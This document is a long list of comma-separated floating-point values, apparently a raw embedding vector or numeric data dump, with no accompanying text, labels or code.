-0.04306339845061302, -0.010258026421070099, 0.023828621953725815, -0.017359737306833267, 0.0017226921627297997, 0.031781911849975586, 0.03796954080462456, -0.021578574553132057, 0.008695494383573532, -0.015015938319265842, 0.014117482118308544, 0.02246921882033348, 0.008859559893608093, -0.04006333649158478, 0.014750308357179165, -0.01859413832426071, -0.04543844982981682, -0.011078355833888054, 0.010672098025679588, 0.0819392129778862, -0.015203442424535751, 0.04462593048810959, -0.008906436152756214, -0.015734704211354256, -0.02060980536043644, 0.02237546630203724, 0.0025586471892893314, -0.008828309364616871, -0.04428217560052872, 0.004316496197134256, -0.00635169493034482, -0.029438113793730736, 0.018469136208295822, -0.023734871298074722, -0.015117502771317959, -0.029656868427991867, -0.0019502360373735428, -0.00579699594527483, -0.005734494887292385, -0.01311746146529913, -0.009734578430652618, -0.006347788963466883, -0.010843976400792599, -0.02120356820523739, -0.03900081291794777, -0.03534448891878128, -0.020937936380505562, -0.013578408397734165, 0.007617346476763487, 0.03675076737999916, 0.005668086931109428, 0.003929769620299339, 0.007547032553702593, 0.0009853721130639315, -0.04153211787343025, 0.023500490933656693, -0.03884455934166908, -0.05990749970078468, 0.022672347724437714, 0.031906917691230774, 0.004648534581065178, 0.01083616353571415, 0.02760995179414749, 0.01664097234606743, -0.009523636661469936, -0.006769672501832247, 0.0310318972915411, -0.03020375594496727, 0.015586262568831444, 0.01253151148557663, 0.013554970733821392, -0.020391050726175308, -0.024906769394874573, 0.004109460860490799, 0.015117502771317959, 0.003933676052838564, -0.016078460961580276, 0.050876062363386154, 0.011859622783958912, 0.03265693038702011, 0.06134502962231636, -0.0071251485496759415, 0.0036465604789555073, 0.015062814578413963, 0.02129731886088848, 0.0038633618969470263, -0.026313049718737602, -0.000978047726675868, -0.0037891415413469076, 0.03462572395801544, -0.0304225105792284, 0.020562930032610893, 0.011148669756948948, -0.014023730531334877, 0.03262568265199661, 0.0310318972915411, 0.0015556964790448546, -0.029563117772340775, -0.019734786823391914, -0.010945540852844715, 0.014648742973804474, 0.03125065192580223, 0.030031876638531685, -0.02832871675491333, -0.051344823092222214, 0.010086148045957088, -0.032125670462846756, 0.0026035699993371964, 0.026063043624162674, 0.053782373666763306, 0.00896112434566021, 0.004750099033117294, 0.00357038713991642, -0.016562845557928085, 0.017750371247529984, -0.0036934365052729845, 0.011492427438497543, -0.009281443431973457, -0.008218921720981598, 0.0269224364310503, -0.025813039392232895, -0.03790704160928726, -0.015117502771317959, 0.015719078481197357, 0.01732848584651947, -0.004879008047282696, 0.013133086264133453, 0.024047376587986946, -0.035125732421875, 0.007570470683276653, -0.01404716819524765, -0.022422343492507935, -0.007730630226433277, -0.014898748137056828, -0.02073480747640133, 0.0239848755300045, 0.010617408901453018, -0.007250151131302118, 0.00412508612498641, 0.010976791381835938, -0.03150065615773201, -0.026391176506876945, -0.01979728788137436, -0.004089929163455963, 0.025266151875257492, 0.015844080597162247, -0.022625472396612167, 0.02798496000468731, 0.024859894067049026, -0.00045093713561072946, -0.021844206377863884, 0.015187816694378853, 0.014523740857839584, 0.045938458293676376, 0.0050860438495874405, -0.03243817761540413, -0.012851830571889877, -0.012828392907977104, 0.020750433206558228, -0.010015834122896194, 0.004539157263934612, 0.024281756952404976, 0.005488395690917969, -0.03525073453783989, -0.006589981261640787, 0.027688078582286835, -0.0149378115311265, 0.04053209722042084, -0.016890978440642357, -0.006230598781257868, -0.015609701164066792, -0.0011601804289966822, 0.009117377921938896, -0.0010674051009118557, 0.006754047237336636, 0.013531532138586044, 0.0044141546823084354, 0.035531990230083466, -0.009633013978600502, -0.029234984889626503, -0.041250862181186676, 0.0003598707844503224, 0.018891019746661186, 0.006183722987771034, -0.013375279493629932, 0.05468863993883133, 0.0010947494301944971, -0.0033555387053638697, 0.010101773776113987, 0.0005966921453364193, -0.008515803143382072, -0.04434467479586601, 0.03656326234340668, 0.019125400111079216, 0.014890936203300953, -0.015172191895544529, -0.00842205062508583, 0.012906519696116447, -0.00006009036587784067, -0.0070470222271978855, 0.0017490600002929568, -0.044657181948423386, 0.001391630619764328, 0.045594703406095505, -0.021734828129410744, 0.011445551179349422, -0.006461072247475386, 0.012054938822984695, -0.016484718769788742, 0.006039188709110022, -0.04281339421868324, 0.014961250126361847, -0.045719705522060394, 0.011398675851523876, -0.005453238729387522, 0.019844165071845055, 0.01745348982512951, 0.02503177337348461, -0.009226755239069462, 0.02059417963027954, 0.005961061920970678, -0.03921956941485405, -0.004691504407674074, -0.0008437676005996764, -0.02800058387219906, -0.01685972698032856, 0.017250360921025276, 0.01592220738530159, 0.004964947234839201, -0.00860955473035574, -0.014445614069700241, -0.05187608301639557, -0.013437780551612377, -0.005300892051309347, 0.06612638384103775, -0.012656514532864094, -0.017594117671251297, 0.022266089916229248, -0.01768786832690239, 0.029906874522566795, -0.01105491816997528, -0.02353174053132534, -0.029078731313347816, -0.0018564841011539102, 0.00825798511505127, 0.004464936908334494, -0.013726849108934402, 0.026281798258423805, 0.02737557142972946, -0.027094315737485886, -0.030281882733106613, -0.009750203229486942, -0.020641054958105087, 0.013219025917351246, 0.0004629002942238003, 0.005832152906805277, 0.016656598076224327, -0.0005708126700483263, -0.027094315737485886, -0.004726661369204521, 0.008992374874651432, 0.025469280779361725, -0.024047376587986946, -0.006226692348718643, -0.024500511586666107, -0.004445405211299658, 0.0007246244931593537, 0.0035723401233553886, -0.013195588253438473, -0.02575053833425045, 0.005769651848822832, 0.02109418995678425, -0.015476885251700878, -0.004718848504126072, -0.015187816694378853, 0.016328465193510056, 0.009500198066234589, -0.031203776597976685, 0.019953541457653046, -0.009797079488635063, 0.016469093039631844, 0.025719286873936653, -0.0035469490103423595, 0.012969020754098892, 0.018359757959842682, -0.004093835595995188, -0.028469344601035118, -0.006855611689388752, -0.00883612222969532, 0.0011416253400966525, 0.04871976748108864, -0.013508094474673271, -0.005195421166718006, 0.00438681012019515, -0.013812788762152195, -0.010375216603279114, 0.012851830571889877, -0.00006579727050848305, 0.01932852901518345, -0.026656806468963623, -0.023687994107604027, 0.010820538736879826, -0.001512726885266602, -0.012515886686742306, 0.022781725972890854, -0.032844435423612595, -0.006945457309484482, 0.002757870126515627, -0.0021855924278497696, -0.03175066411495209, 0.0030977209098637104, -0.001396513544023037, -0.03481322526931763, -0.0350944809615612, 0.010914290323853493, -0.024906769394874573, -0.007535313721746206, 0.020078543573617935, 0.0023965344298630953, -0.008273609913885593, 0.015015938319265842, 0.001053732936270535, 0.02670368179678917, -0.028875602409243584, 0.01942227967083454, 0.002580131869763136, 0.028266215696930885, -0.017765995115041733, 0.017750371247529984, 0.0035567148588597775, 0.005359486676752567, 0.017187858000397682, -0.015765953809022903, -0.0036016376689076424, -0.03487572818994522, 0.0012265881523489952, -0.03196941688656807, -0.01146898977458477, -0.0035215578973293304, -0.001214869087561965, -0.03678201884031296, 0.025016147643327713, -0.018078502267599106, 0.02587554045021534, -0.025000521913170815, -0.013265902176499367, -0.02304735593497753, 0.0009179878979921341, 0.008890810422599316, 0.016094086691737175, -0.04637596756219864, 0.01386747695505619, -0.0021348102018237114, -0.010539282113313675, 0.0187191404402256, -0.024438010528683662, 0.006652482785284519, -0.010492406785488129, -0.02257859706878662, 0.002541068708524108, -0.025672411546111107, 0.015844080597162247, -0.02176607958972454, -0.007351716049015522, 0.0004804787749890238, -0.010617408901453018, 0.016344090923666954, 0.014094044454395771, -0.014797183685004711, -0.03182879090309143, 0.009000187739729881, -0.03753203526139259, -0.01604720950126648, -0.049469783902168274, 0.03568824380636215, 0.003550855442881584, -0.04059459641575813, 0.005918092094361782, -0.00456650136038661, -0.009523636661469936, -0.003781328909099102, -0.018422259017825127, 0.001936563872732222, -0.00136135658249259, -0.022687973454594612, -0.007902508601546288, -0.02315673418343067, 0.00655482430011034, -0.001002950593829155, 0.0024473166558891535, -0.03092252090573311, 0.009976770728826523, 0.005218858830630779, -0.030875643715262413, -0.017703494057059288, -0.03818829730153084, 0.024547386914491653, -0.012804955244064331, 0.03725077584385872, -0.016812851652503014, 0.03753203526139259, -0.0031992855947464705, 0.00865643098950386, -0.017250360921025276, -0.04637596756219864, -0.007543126121163368, -0.019391030073165894, 0.002168013947084546, -0.014719056896865368, -0.01614096201956272, 0.031110024079680443, 0.009531448595225811, 0.014250297099351883, 0.004312590230256319, -0.04025084152817726, 0.0028320904821157455, -0.03206316754221916, -0.034000709652900696, 0.006601700093597174, -0.005058699287474155, -0.020078543573617935, 0.00936738308519125, 0.0005888794548809528, -0.0009502151515334845, -0.010179899632930756, 0.004804787691682577, 0.0010830303654074669, 0.02389112301170826, -0.005257922224700451, -0.0015732750762254, 0.04131336137652397, -0.02410987764596939, -0.02210983633995056, -0.04471968486905098, -0.011929936707019806, 0.015930019319057465, -0.03675076737999916, 0.002132856985554099, -0.017640992999076843, 0.02421925589442253, 0.0005991336074657738, 0.007043115794658661, 0.012117440812289715, -0.0046875979751348495, 0.038094546645879745, 0.011476801708340645, -0.0030625639483332634, 0.015531574375927448, 0.02095356211066246, -0.009601762518286705, -0.03381320461630821, 0.024781767278909683, 0.02892247959971428, -0.01721910946071148, 0.01539875939488411, 0.010195525363087654, -0.009406446479260921, -0.004918071441352367, -0.0362820066511631, -0.0011758058099076152, 0.03450072184205055, -0.0351569838821888, -0.020187921822071075, 0.02729744464159012, -0.012633075937628746, 0.01387528982013464, 0.004515719134360552, 0.01590658165514469, 0.001906289835460484, -0.01685972698032856, -0.009453322738409042, -0.01882851868867874, 0.0052969856187701225, -0.05006354674696922, 0.006343882530927658, 0.007519687991589308, -0.01673472486436367, 0.022984854876995087, -0.02904748171567917, -0.013562782667577267, -0.019984792917966843, 0.02328173629939556, 0.01779724657535553, -0.014734682627022266, -0.012648701667785645, -0.004343840759247541, 0.009859580546617508, -0.01333621609956026, -0.0036367946304380894, -0.0039082844741642475, 0.009867393411695957, -0.0009853721130639315, -0.01240650936961174, 0.023500490933656693, -0.02506302297115326, -0.021047314628958702, 0.012281506322324276, 0.014844059944152832, 0.009093940258026123, 0.013453406281769276, 0.0069063943810760975, -0.032969437539577484, 0.005457145161926746, -0.00568371219560504, -0.0216567013412714, -0.02315673418343067, 0.021984834223985672, -0.01814100332558155, 0.01942227967083454, -0.015836268663406372, 0.011172108352184296, 0.01945353113114834, 0.03668826445937157, 0.008562678471207619, 0.009273631498217583, -0.005523552652448416, 0.0008379081264138222, -0.01105491816997528, -0.0015459307469427586, -0.016453469172120094, 0.030516261234879494, 0.010500218719244003, -0.00783610064536333, 0.004699316807091236, 0.00931269396096468, -0.010554907843470573, -0.01574251614511013, -0.004105554427951574, 0.02178170531988144, 0.0024219255428761244, -0.0012011969229206443, 0.0198910403996706, 0.0016748396446928382, -0.022437969222664833, -0.010640847496688366, 0.036344509571790695, -0.009617388248443604, -0.020344175398349762, 0.012750266119837761, -0.0033203817438334227, 0.019125400111079216, -0.017234735190868378, -0.02212546207010746, -0.006664201617240906, -0.011250235140323639, 0.03690702095627785, 0.03840705007314682, -0.03453196957707405, 0.024609887972474098, 0.014195608906447887, 0.01921915076673031, 0.0023477051872760057, 0.023203609511256218, 0.003015687922015786, -0.002046917797997594, -0.017531616613268852, 0.02973499521613121, -0.009117377921938896, 0.009750203229486942, -0.005429801065474749, -0.004218838177621365, 0.018797267228364944, 0.0011992438230663538, 0.02293797954916954, 0.025109898298978806, 0.009203317575156689, 0.033781956881284714, -0.010765849612653255, 0.008445489220321178, 0.004312590230256319, 0.00503916759043932, -0.00842205062508583, -0.039813332259655, 0.02706306427717209, -0.021016063168644905, 0.016437843441963196, -0.030000627040863037, 0.021484823897480965, -0.0012334241764619946, -0.014500302262604237, 0.017359737306833267, 0.0012129159877076745, -0.029406864196062088, 0.013406530022621155, -0.04518844187259674, -0.008507990278303623, -0.028281839564442635, 0.03146940842270851, -0.011156482622027397, -0.032125670462846756, -0.01146898977458477, 0.0014238578733056784, 0.0024023938458412886, -0.002511771162971854, -0.019750412553548813, -0.022031709551811218, 0.025484906509518623, -0.0140549810603261, 0.005902466829866171, -0.021922333166003227, 0.013234651647508144, 0.022500470280647278, 0.028656847774982452, 0.04281339421868324, -0.008672055788338184, 0.011812746524810791, 0.019000396132469177, -0.015312819741666317, 0.01592220738530159, 0.019266027957201004, 0.0010097867343574762, 0.006562637165188789, 0.028047461062669754, 0.00003234930773032829, 0.0050508868880569935, 0.006589981261640787, 0.010273652151226997, -0.014695619232952595, 0.0027813080232590437, 0.008539240807294846, 0.006195441819727421, 0.00807048100978136, -0.0280943363904953, 0.00959395058453083, -0.012789329513907433, -0.02082855999469757, -0.022219214588403702, 0.003974692430347204, -0.04200087487697601, -0.04087585210800171, 0.006879049818962812, 0.02059417963027954, -0.0016201509861275554, -0.020219171419739723, -0.0004704688035417348, 0.003423899644985795, 0.0010332247475162148, -0.009703327901661396, 0.01907852292060852, -0.025141149759292603, -0.030031876638531685, -0.00410164799541235, 0.018750391900539398, 0.043250903487205505, -0.010187712498009205, -0.03173503652215004, -0.017031606286764145, 0.0013642862904816866, -0.010054897516965866, -0.004300870932638645, -0.011578367091715336, 0.01778162084519863, -0.033656951040029526, -0.01235963311046362, -0.026203671470284462, -0.022406717762351036, -0.0036172629334032536, -0.020984813570976257, 0.004871195647865534, 0.004425873514264822, -0.025266151875257492, -0.0014883122639730573, -0.013258089311420918, -0.0010957260383293033, 0.014969062060117722, 0.0169534794986248, -0.024297382682561874, -0.01781287230551243, -0.031797539442777634, -0.0031895197462290525, 0.0076564098708331585, 0.014312799088656902, 0.00016980334476102144, 0.032250672578811646, 0.02270359918475151, -0.02389112301170826, 0.008945499546825886, -0.01789099909365177, -0.016453469172120094, -0.03334444761276245, -0.012133065611124039, -0.026297423988580704, 0.007234525866806507, 0.0071524931117892265, -0.00200590118765831, -0.014336236752569675, -0.008906436152756214, -0.0028965447563678026, 0.032500676810741425, 0.002390675013884902, -0.01734411157667637, -0.0011279531754553318, 0.014711244963109493, -0.036344509571790695, 0.024063002318143845, -0.006125127896666527, 0.013140899129211903, 0.011711182072758675, 0.008593929000198841, -0.015250318683683872, -0.007226713467389345, -0.010773662477731705, -0.014390924945473671, -0.02412550337612629, -0.003769609844312072, -0.0018076549749821424, 0.028734974563121796, 0.00030444972799159586, 0.016234714537858963, 0.025703661143779755, -0.006039188709110022, -0.011164295487105846, -0.008742369711399078, 0.010812725871801376, -0.011750245466828346, 0.00004345793786342256, -0.010968978516757488, 0.008632992394268513, -0.0216723270714283, -0.0051993271335959435, 0.020344175398349762, -0.0012822533026337624, -0.013172149658203125, -0.00047974634799174964, 0.02073480747640133, -0.00913300272077322, -0.026844309642910957, -0.043844666332006454, 0.003091861493885517, -0.013679972849786282, 0.0016025725053623319, -0.0017900763778015971, -0.013719036243855953, -0.013929978013038635, 0.02315673418343067, 0.016094086691737175, -0.014015917666256428, -0.037407029420137405, 0.006855611689388752, -0.020062919706106186, -0.0059415302239358425, 0.011937749572098255, -0.006144659593701363, 0.006058720406144857, 0.007601721212267876, 0.03546949103474617, -0.0039805518463253975, -0.006297006271779537, -0.0024004406295716763, -0.025719286873936653, 0.0409383550286293, 0.0027754486072808504, -0.017531616613268852, -0.010156461969017982, -0.0023652836680412292, -0.01859413832426071, -0.007722817361354828, 0.003388742683455348, 0.009172066114842892, -0.015680015087127686, -0.00883612222969532, -0.008109544403851032, -0.011398675851523876, -0.006324350833892822, -0.00635169493034482, 0.03465697169303894, 0.004535250831395388, -0.00015234692546073347, -0.01563313789665699, 0.017844121903181076, -0.036469511687755585, 0.02293797954916954, -0.01789099909365177, 0.03262568265199661, -0.013851851224899292, 0.001386747695505619, 0.013140899129211903, -0.011211171746253967, 0.0026074761990457773, -0.00837517436593771, 0.010187712498009205, -0.014469051733613014, 0.032000668346881866, -0.008820496499538422, 0.014508115127682686, 0.015719078481197357, -0.01235963311046362, 0.007511875592172146, 0.028359966352581978, 0.007246245164424181, 0.0023262205068022013, 0.01298464648425579, -0.035281985998153687, -0.0017226921627297997, -0.01235963311046362, -0.006066532805562019, 0.00552745908498764, -0.0027559169102460146, -0.03637576103210449, -0.03228192403912544, -0.018078502267599106, -0.009828330017626286, -0.011211171746253967, 0.00778531888499856, -0.0036524198949337006, 0.016906602308154106, 0.013094022870063782, 0.003171941265463829, 0.022203588858246803, 0.008054855279624462, 0.006519667338579893, -0.0037071085534989834, 0.028422467410564423, 0.02659430541098118, -0.01065647229552269, -0.00022803210595156997, 0.002373096300289035, 0.02140669710934162, 0.008468926884233952, -0.006488416809588671, -0.016484718769788742, -0.002244187518954277, 0.012031501159071922, -0.016125336289405823, 0.01851601153612137, -0.017515990883111954, -0.00954707432538271, -0.03020375594496727, -0.01585189253091812, 0.013219025917351246, 0.03182879090309143, 0.035875748842954636, 0.008828309364616871, -0.003211004426702857, -0.018875394016504288, 0.026734933257102966, -0.001002950593829155, 0.009609575383365154, 0.012640888802707195, -0.01177368313074112, 0.009867393411695957, 0.026500552892684937, 0.010203338228166103, 0.02073480747640133, 0.014094044454395771, -0.025328652933239937, -0.009562700055539608, 0.015140941366553307, 0.01275807898491621, -0.0023926279973238707, 0.014351862482726574, 0.019109774380922318, 0.011898686178028584, 0.0175784919410944, 0.015445634722709656, -0.01346121821552515, -0.025359904393553734, -0.011718994937837124, 0.023203609511256218, 0.005179795436561108, -0.014383113011717796, -0.015281569212675095, -0.0023320799227803946, 0.00949238520115614, -0.02445363625884056, 0.0022520001512020826, -0.021625451743602753, 0.018094127997756004, 0.00016101410437840968, 0.013195588253438473, 0.030844394117593765, 0.009039251133799553, 0.008625180460512638, -0.024375509470701218, 0.014851872809231281, -0.02235984243452549, -0.02821933850646019, 0.017015980556607246, -0.0011006089625880122, 0.0015596029115840793, -0.0019980885554105043, -0.014125294983386993, -0.0125862006098032, -0.014508115127682686, -0.04281339421868324, -0.03818829730153084, 0.010859602130949497, -0.0017607789486646652, -0.005379018373787403, 0.00682436116039753, 0.0029883435927331448, 0.016937853768467903, -0.0017109732143580914, -0.04003208503127098, 0.022172337397933006, 0.010640847496688366, -0.003685623873025179, 0.0007163235568441451, 0.012375257909297943, -0.015594075433909893, 0.006132940296083689, 0.010031459853053093, -0.0029024044051766396, -0.0064376345835626125, -0.01698472909629345, 0.015445634722709656, 0.0005317493923939764, 0.00710952328518033, 0.0012217052280902863, 0.018078502267599106, -0.016422217711806297, 0.009461134672164917, 0.0263286754488945, 0.030235005542635918, 0.017422238364815712, -0.01826600544154644, -0.0005127059994265437, 0.03137565404176712, -0.007132961414754391, 0.0030879550613462925, -0.012617451138794422, 0.02421925589442253, 0.006414196453988552, -0.0034864009357988834, -0.006504042074084282, 0.014789370819926262, -0.012422134168446064, -0.014328423887491226, 0.025266151875257492, -0.014234672300517559, -0.015258130617439747, 0.006019657012075186, -0.027828706428408623, -0.000337897683493793, 0.03112564980983734, -0.004437592811882496, 0.023031730204820633, 0.008617367595434189, -0.018406635150313377, 0.017828498035669327, -0.021953582763671875, 0.00737906014546752, -0.006726703140884638, 0.02540677972137928, 0.008062668144702911, -0.00758218951523304, -0.01696910336613655, -0.0028867789078503847, -0.016469093039631844, 0.02223483845591545, 0.0015547199873253703, -0.016062835231423378, -0.05643867701292038, 0.018000375479459763, 0.030250631272792816, 0.011672118678689003, 0.0010703348089009523, -0.00399422412738204, -0.025141149759292603, -0.019344152882695198, 0.012609638273715973, -0.010086148045957088, -0.017469115555286407, 0.004910258576273918, 0.011117419227957726, -0.0033555387053638697, -0.0016865585930645466, 0.0012803002027794719, 0.03887581080198288, -0.0004577732179313898, -0.018125377595424652, -0.0015303053660318255, 0.03221942111849785, 0.011195546016097069, 0.007640784606337547, -0.005898560397326946, -0.006535292603075504, 0.02659430541098118, 0.0062696621753275394, -0.0070118652656674385, -0.0037578910123556852, 0.015836268663406372, -0.0006528456578962505, 0.009586137719452381, -0.018656639382243156, 0.00860955473035574, 0.01601595990359783, -0.03300068899989128, 0.0005717892781831324, -0.01837538368999958, 0.04400091990828514, 0.002490286249667406, -0.0010625221766531467, 0.014883123338222504, 0.039157066494226456, 0.016469093039631844, -0.011297110468149185, 0.013734661974012852, -0.004793068859726191, 0.011804933659732342, 0.002798886504024267, -0.0023516116198152304, 0.023469239473342896, 0.0001306179619859904, -0.0007583166006952524, -0.016922228038311005, -0.00675795366987586, -0.03290693834424019, 0.00675795366987586, 0.0016045257216319442, -0.011914310976862907, 0.001980510074645281, -0.00684779928997159, -0.008156420662999153, 0.00949238520115614, 0.003929769620299339, -0.016812851652503014, -0.0034453843254595995, -0.016109710559248924, 0.01007833518087864, 0.00456650136038661, 0.030469385907053947, 0.0228286013007164, 0.0035371831618249416, -0.013578408397734165, -0.00357038713991642, -0.04637596756219864, 0.0011484614806249738, -0.002884825924411416, 0.025453656911849976, -0.008570491336286068, 0.0033399134408682585, -0.032344426959753036, -0.01083616353571415, -0.0010166227584704757, -0.02210983633995056, -0.010679910890758038, -0.0585012212395668, 0.006433728151023388, -0.009226755239069462, -0.008882997557520866, 0.007597814779728651, 0.00007129055302357301, 0.018422259017825127, 0.031063148751854897, 0.0014150686329230666, 0.015930019319057465, -0.011851809918880463, 0.02120356820523739, 0.0032383487559854984, 0.0008340018102899194, -0.014617492444813251, 0.010718973353505135, 0.018656639382243156, -0.0009209176641888916, 0.0216723270714283, -0.01839100942015648, 0.023359863087534904, -0.004402435850352049, 0.009047063998878002, -0.01498468779027462, -0.015586262568831444, 0.02881310135126114, -0.018406635150313377, -0.00914081558585167, -0.01628158986568451, -0.008406425826251507, 0.025797413662075996, 0.0023125482257455587, -0.01164868101477623, 0.005898560397326946, -0.014586241915822029, -0.031203776597976685, -0.006871236953884363, 0.004300870932638645, -0.01992228999733925, -0.006855611689388752, -0.0017529663164168596, 0.03128190338611603, 0.0055899606086313725, 0.006812642328441143, 0.0071954624727368355, -0.017172234132885933, 0.0280943363904953, 0.007261870428919792, 0.0076915668323636055, 0.012648701667785645, -0.00039942239527590573, 0.020812934264540672, 0.017625367268919945, -0.019016021862626076, 0.007086085621267557, 0.04284464567899704, 0.00337897683493793, 0.009687702171504498, -0.010554907843470573, -0.015031564049422741, 0.002742244629189372, 0.020750433206558228, 0.0093595702201128, 0.0228129755705595, -0.026641180738806725, -0.013140899129211903, -0.01731286197900772, -0.010578345507383347, -0.005515740253031254, -0.0152112552896142, -0.02178170531988144, -0.0010869367979466915, 0.008328299038112164, 0.001986369490623474, 0.006640763487666845, -0.0005971804494038224, -0.025703661143779755, 0.052876103669404984, -0.00013220490654930472, -0.01696910336613655, 0.005246203392744064, -0.01570345275104046, -0.019266027957201004, 0.011211171746253967, 0.010054897516965866, 0.004894633311778307, 0.0009653521701693535, -0.0003313057532068342, 0.00954707432538271, -0.001043967087753117, 0.022172337397933006, 0.008664242923259735, -0.0093595702201128, 0.008125169202685356, -0.006781391333788633, -0.014086231589317322, -0.004468843340873718, -0.009609575383365154, -0.0011582273291423917, -0.0060470011085271835, -0.01128929853439331, -0.007609533611685038, -0.012875269167125225, 0.0019424234051257372, -0.012781516648828983, 0.004629002884030342, -0.009758016094565392, -0.0000769669350120239, -0.017750371247529984, -0.018000375479459763, 0.02645367756485939, 0.013070585206151009, -0.034719474613666534, 0.0039043782744556665, -0.005410269368439913, 0.013390904292464256, 0.00552745908498764, -0.005773557815700769, 0.0016924181254580617, 0.016312841325998306, -0.011914310976862907, 0.0022402810864150524, -0.015265943482518196, -0.0003498608130030334, -0.009828330017626286, 0.0007641761330887675, -0.0025957573670893908, -0.00878143310546875, -0.00684779928997159, 0.00544542632997036, 0.0006377086392603815, 0.0033047564793378115, 0.0010732646333053708, -0.006558730732649565, 0.01615658774971962, 0.011969000101089478, 0.052532345056533813, -0.010359590873122215, 0.009086127392947674, 0.01105491816997528, -0.002345752203837037, -0.004433686379343271, -0.003261786885559559, -0.013859664089977741, 0.025609910488128662, -0.0034610098227858543, 0.011695556342601776, -0.013898727484047413, 0.011781495995819569, 0.022203588858246803, 0.004500093869864941, 0.0008613460813648999, -0.003959067165851593, -0.011843997053802013, -0.0038184390868991613, 0.0007798014557920396, -0.007039209362119436, -0.012429947033524513, -0.004453218076378107, -0.0030645171646028757, -0.014648742973804474, 0.004605564754456282, -0.005675899796187878, 0.006500135641545057, 0.014773746021091938, 0.00914081558585167, 0.009750203229486942, -0.0064102900214493275, 0.015422197058796883, -0.01382060069590807, -0.0023926279973238707, -0.005488395690917969, -0.004875101614743471, 0.0012832299107685685, 0.000892596784979105, 0.015711264684796333, 0.03240692615509033, -0.03850080445408821, -0.008304860442876816, 0.007781412452459335, -0.04165711998939514, 0.005105575546622276, 0.005254015792161226, -0.0033457728568464518, 0.0014609680511057377, 0.013445593416690826, -0.001270534354262054, 0.0005029402091167867, -0.0015000313287600875, -0.011375237256288528, -0.0008847840945236385, 0.00949238520115614, -0.022094210609793663, 0.0134690310806036, -0.0016611674800515175, 0.006746234372258186, 0.013351840898394585, -0.01439873781055212, -0.011836184188723564, 0.015726890414953232, -0.008882997557520866, -0.00918769184499979, 0.006871236953884363, -0.040907103568315506, 0.008945499546825886, 0.010695535689592361, 0.0031934259459376335, 0.023812996223568916, 0.020062919706106186, -0.016906602308154106, 0.006343882530927658, 0.012508073821663857, -0.006433728151023388, -0.00953926146030426, 0.02659430541098118, -0.00954707432538271, 0.0051212008111178875, 0.0025586471892893314, 0.019156649708747864, 0.011453364044427872, -0.0011767824180424213, -0.002490286249667406, 0.011843997053802013, -0.009570511989295483, -0.001214869087561965, -0.013734661974012852, 0.0005673946579918265, 0.006093877367675304, 0.007746255490928888, 0.0084767397493124, -0.010812725871801376, -0.011093981564044952, -0.0020254328846931458, 0.009023625403642654, 0.004636815749108791, -0.004285245668143034, 0.0006181769422255456, 0.017844121903181076, -0.005773557815700769, -0.008343923836946487, -0.019969167187809944, 0.016578471288084984, -0.003877033945173025, -0.012469010427594185, -0.0017383175436407328, -0.018187880516052246, -0.007742349058389664, -0.004984478931874037, 0.014304986223578453, 0.004945415537804365, 0.024641139432787895, 0.015664389356970787, 0.008484551683068275, -0.012320569716393948, 0.00989864394068718, -0.009172066114842892, 0.008882997557520866, 0.015890955924987793, -0.002263719215989113, -0.023922374472022057, -0.010875226929783821, -0.013047147542238235, -0.0216723270714283, 0.0012939723674207926, 0.011093981564044952, 0.009508010931313038, -0.01945353113114834, 0.009343945421278477, 0.019000396132469177, 0.006160284858196974, -0.016094086691737175, 0.012750266119837761, 0.02996937558054924, -0.0037539845798164606, -0.015015938319265842, -0.0024785674177110195, 0.006168097723275423, 0.009289256297051907, -0.0036289819981902838, -0.0013203400885686278, -0.005898560397326946, 0.02421925589442253, -0.010758036747574806, -0.015555012039840221, 0.012281506322324276, -0.008726744912564754, 0.029641244560480118, -0.022062961012125015, -0.022531719878315926, 0.0020234796684235334, -0.005441519897431135, 0.012304943986237049, -0.014594054780900478, -0.0125862006098032, 0.032375674694776535, 0.013015897013247013, 0.019391030073165894, -0.027906833216547966, 0.026156796142458916, 0.02200045995414257, 0.011554928496479988, -0.002193405060097575, 0.018547262996435165, 0.00396297313272953, 0.012031501159071922, -0.0057657454162836075, -0.016922228038311005, 0.0001223170111188665, -0.005968874786049128, -0.012898706831037998, 0.03112564980983734, 0.023828621953725815, 0.014531553722918034, 0.01070334855467081, -0.005136826075613499, 0.015101877972483635, 0.006797017063945532, -0.019875414669513702, -0.0175784919410944, 0.020203547552227974, 0.025578659027814865, -0.007742349058389664, 0.016062835231423378, 0.018297256901860237, -0.004093835595995188, -0.0044141546823084354, -0.034938231110572815, -0.000993673107586801, 0.0017422238597646356, -0.017015980556607246, 0.0005380971706472337, 0.0035938250366598368, -0.00011468744924059138, 0.010523657314479351, -0.0037754694931209087, -0.0022363748867064714, -0.018469136208295822, 0.02823496423661709, 0.00740249827504158, 0.009211129508912563, -0.017390988767147064, 0.003322334960103035, -0.014484677463769913, -0.0022051241248846054, -0.009570511989295483, -0.000022186743080965243, -0.046907227486371994, 0.0018271865556016564, 0.0047657242976129055, 0.017187858000397682, -0.016172213479876518, 0.013851851224899292, -0.002380909165367484, -0.007359528448432684, 0.01825038157403469, -0.01276589184999466, 0.0009311717585660517, 0.018297256901860237, -0.01352372020483017, 0.0008501153788529336, 0.016219088807702065, 0.0281099621206522, -0.007367341313511133, 0.020531678572297096, 0.006601700093597174, -0.017734745517373085, 0.021344196051359177, 0.0033145223278552294, 0.0017978891264647245, 0.004281339235603809, 0.006425915285944939, 0.007636878173798323, 0.022328590974211693, -0.0316256619989872, 0.0033145223278552294, -0.007179837208241224, -0.007175931241363287, -0.013672159984707832, -0.002087934175506234, 0.0007465975941158831, 0.0005463981069624424, 0.034344468265771866, 0.0014326471136882901, -0.015898769721388817, 0.013422154821455479, -0.00002508597208361607, -0.01428154855966568, -0.009429884143173695, -0.014679993502795696, -0.008390800096094608, -0.001758825732395053, 0.0251724012196064, -0.018469136208295822, -0.003609450301155448, 0.007211088202893734, -0.0014609680511057377, 0.010539282113313675, -0.0009336132206954062, 0.010336153209209442, -0.00953926146030426, 0.02200045995414257, -0.00200590118765831, -0.00396297313272953, 0.01199243776500225, 0.0026406801771372557, 0.0059415302239358425, -0.00412508612498641, 0.0010605689603835344, 0.002087934175506234, 0.0033164755441248417, -0.013148711994290352, 0.022391092032194138, 0.0018760156817734241, -0.005171983037143946, 0.004183681216090918, 0.007886883802711964, -0.001436553429812193, -0.007097804453223944, 0.003337960224598646, 0.025813039392232895, -0.004586033057421446, -0.01931290328502655, -0.005339955445379019, 0.02412550337612629, 0.026031794026494026, 0.010375216603279114, -0.005382924806326628, -0.016719099134206772, 0.0010732646333053708, -0.02740682289004326, 0.005211046431213617, 0.010750224813818932, -0.009515823796391487, 0.003332100808620453, -0.003574293339625001, 0.007922040298581123, 0.015094065107405186, 0.030594388023018837, -0.02015667036175728, 